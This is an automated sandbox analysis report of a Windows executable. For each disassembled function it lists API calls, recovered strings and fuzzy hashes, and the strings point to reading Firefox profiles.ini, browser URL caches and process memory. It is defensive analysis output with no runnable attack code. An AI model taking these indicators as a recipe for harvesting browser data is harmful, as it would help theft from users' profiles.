                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                • String ID: :stringdata$ftp://$http://$https://
                                • API String ID: 2787044678-1921111777
                                • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00414002, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                Download Yara Rule
                                APIs
                                • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                • GetWindowRect.USER32(?,?), ref: 00414088
                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                • GetDC.USER32 ref: 004140E3
                                • wcslen.MSVCRT ref: 00414123
                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                • ReleaseDC.USER32(?,?), ref: 00414181
                                • _snwprintf.MSVCRT ref: 00414244
                                • SetWindowTextW.USER32(?,?), ref: 00414258
                                • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                • GetClientRect.USER32(?,?), ref: 004142E1
                                • GetWindowRect.USER32(?,?), ref: 004142EB
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                • GetClientRect.USER32(?,?), ref: 0041433B
                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                • String ID: %s:$EDIT$STATIC
                                • API String ID: 2080319088-3046471546
                                • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004131DC, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                Download Yara Rule
                                APIs
                                • EndDialog.USER32(?,?), ref: 00413221
                                • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                • memset.MSVCRT ref: 00413292
                                • memset.MSVCRT ref: 004132B4
                                • memset.MSVCRT ref: 004132CD
                                • memset.MSVCRT ref: 004132E1
                                • memset.MSVCRT ref: 004132FB
                                • memset.MSVCRT ref: 00413310
                                • GetCurrentProcess.KERNEL32 ref: 00413318
                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                • memset.MSVCRT ref: 004133C0
                                • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                • memcpy.MSVCRT ref: 004133FC
                                • wcscpy.MSVCRT ref: 0041341F
                                • _snwprintf.MSVCRT ref: 0041348E
                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                • SetFocus.USER32(00000000), ref: 004134B7
                                Strings
                                • {Unknown}, xrefs: 004132A6
                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                • API String ID: 4111938811-1819279800
                                • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00401198, Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                Download Yara Rule
                                APIs
                                • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                • EndDialog.USER32(?,?), ref: 0040135E
                                • DeleteObject.GDI32(?), ref: 0040136A
                                • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                • ShowWindow.USER32(00000000), ref: 00401398
                                • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                • ShowWindow.USER32(00000000), ref: 004013A7
                                • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                • String ID:
                                • API String ID: 829165378-0
                                • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040414F, Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 00404172
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                • wcscpy.MSVCRT ref: 004041D6
                                • wcscpy.MSVCRT ref: 004041E7
                                • memset.MSVCRT ref: 00404200
                                • memset.MSVCRT ref: 00404215
                                • _snwprintf.MSVCRT ref: 0040422F
                                • wcscpy.MSVCRT ref: 00404242
                                • memset.MSVCRT ref: 0040426E
                                • memset.MSVCRT ref: 004042CD
                                • memset.MSVCRT ref: 004042E2
                                • _snwprintf.MSVCRT ref: 004042FE
                                • wcscpy.MSVCRT ref: 00404311
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                • API String ID: 2454223109-1580313836
                                • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00411346, Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                • SetMenu.USER32(?,00000000), ref: 00411453
                                • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                • memcpy.MSVCRT ref: 004115C8
                                • ShowWindow.USER32(?,?), ref: 004115FE
                                • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                • API String ID: 4054529287-3175352466
                                • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00414F1E, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: wcscat$_snwprintfmemset$wcscpy
                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                • API String ID: 3143752011-1996832678
                                • Opcode ID: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                • Opcode Fuzzy Hash: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041352F, Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressProc$HandleModule
                                • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                • API String ID: 667068680-2887671607
                                • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040FB5D, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _snwprintfmemset$wcscpy$wcscat
                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                • API String ID: 1607361635-601624466
                                • Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                • Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041019A, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _snwprintf$memset$wcscpy
                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                • API String ID: 2000436516-3842416460
                                • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004035AD, Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                  • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                  • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                  • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                • String ID:
                                • API String ID: 1043902810-0
                                • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040E2AB, Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                • memset.MSVCRT ref: 0040E380
                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                  • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                • wcschr.MSVCRT ref: 0040E3B8
                                • memcpy.MSVCRT ref: 0040E3EC
                                • memcpy.MSVCRT ref: 0040E407
                                • memcpy.MSVCRT ref: 0040E422
                                • memcpy.MSVCRT ref: 0040E43D
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                • API String ID: 3073804840-2252543386
                                • Opcode ID: 19ed31079114c30659fb9ef41090d998411f1bb22be155d0b2a3a2b8bb14b64c
                                • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                • Opcode Fuzzy Hash: 19ed31079114c30659fb9ef41090d998411f1bb22be155d0b2a3a2b8bb14b64c
                                • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004447D9, Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??2@??3@_snwprintfwcscpy
                                • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                • API String ID: 2899246560-1542517562
                                • Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                • Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004091B8, Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                • String ID:
                                • API String ID: 3715365532-3916222277
                                • Opcode ID: 0b5d2420ae1e05a47c945b1ba07dbbc3733902293ebddf2e47a1979dcc9084dd
                                • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                • Opcode Fuzzy Hash: 0b5d2420ae1e05a47c945b1ba07dbbc3733902293ebddf2e47a1979dcc9084dd
                                • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040DBA7, Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 0040DBCD
                                • memset.MSVCRT ref: 0040DBE9
                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                  • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                  • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                  • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                • wcscpy.MSVCRT ref: 0040DC2D
                                • wcscpy.MSVCRT ref: 0040DC3C
                                • wcscpy.MSVCRT ref: 0040DC4C
                                • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                • wcscpy.MSVCRT ref: 0040DCC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp Download File
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                • API String ID: 3330709923-517860148
                                • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
